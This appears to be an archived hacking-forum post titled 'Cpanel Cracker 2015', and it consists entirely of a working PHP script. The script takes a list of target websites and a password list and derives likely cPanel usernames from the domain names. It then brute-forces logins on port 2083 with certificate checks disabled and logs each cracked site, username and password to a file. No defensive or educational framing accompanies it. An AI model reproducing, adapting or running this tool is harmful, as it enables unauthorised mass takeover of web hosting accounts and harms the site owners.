PDA

View Full Version : Cpanel Cracker 2015



Void
03-08-2015, 03:33 PM
<?php

set_time_limit(0);

/************************************************** ******************
* Private Cpanel Cracker
************************************************** *******************/

class cracker
{

public $sitelist;
public $passlist;

public function calis()
{
$usernames = $this->make_username();
$sitelist = explode("\n",$this->openfile($this->sitelist));
$passlist = explode("\n",$this->openfile($this->passlist));
$increment = 0;

echo "\n\n
Site list -> $this->sitelist\n";
echo "
Pass list -> $this->passlist\n";
echo "
Total urls -> ".count($sitelist)."\n";
echo "
Total pass -> ".count($passlist)."\n";
echo "
Cracking started\n\n";

foreach($sitelist as $id => $site)
{
$increment++;
$site = trim($site);
echo "-------------------------------------------------------\n";
echo "
Trying site: ".$site." $increment / ".count($sitelist)."\n";
if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{
$site = "https://$site";
}
$site= $site.":2083";

if(!$this->pass_site($site))
{
echo "[-]Not cpanel,passing site\n";
echo "-------------------------------------------------------\n\n";
continue;
}

echo "
Connected Cpanel [OK]\n";
echo "
Username: ".$usernames[$id]."\n";
echo "
Loaded ".count($passlist)." passwords\n";

foreach($passlist as $pass)
{
$cracked = false;

$pass=trim($pass);

$result = $this->post($site,$usernames[$id],$pass);

if(preg_match('/security_token/',$result))
{
$cracked = true;
echo "[+]$pass password cracked for $usernames[$id]\n";
echo "-------------------------------------------------------\n\n";
$this->savefile("$site|$usernames[$id]|$pass");
break;
}

}
if(!$cracked){echo "[-]Not found\n";echo "-------------------------------------------------------\n\n";}
}

}

private function make_username()
{
$op = explode("\n",$this->openfile($this->sitelist));
foreach($op as $site)
{

if(eregi('http://',$site)) $site = str_replace("http://","",$site);
if(!eregi('www',$site)) $site = "www.".$site;

$site = explode(".",$site);
$site = str_replace("-","",$site[1]);

$usernames[] = substr($site,0,8);

}
return $usernames;
}

public function lists()
{
echo "[!]Site list: ";
$sitelist = fgets(STDIN);
$sitelist = str_replace("\r\n","",$sitelist);
$sitelist = trim($sitelist);
echo "[!]Pass list: ";
$passlist = fgets(STDIN);
$passlist = str_replace("\r\n","",$passlist);
$passlist = trim($passlist);

return array($sitelist,$passlist);
}

private function post($site,$user,$pass)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
$exec = curl_exec($curl);
return $exec;
}

private function pass_site($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
$exec = curl_exec($curl);
$info = curl_getinfo($curl);

if($info['http_code'] != 0)
{
return true;
}
else
{
return false;
}

}

private function openfile($file)
{
$file = @file_get_contents($file);
if(!$file) exit("WTC File not found ?");
return $file;
}

private function savefile($content)
{
$file = fopen('crackerlog.txt','ab');
fwrite($file,$content."\r\n");
fclose($file);
return $file;
}

}

$class = new cracker();
$lists = $class->lists();

if(empty($lists[0]) || empty($lists[1])) exit("WTC Empty ? ");

$class->sitelist = $lists[0];
$class->passlist = $lists[1];
$class->calis();


?>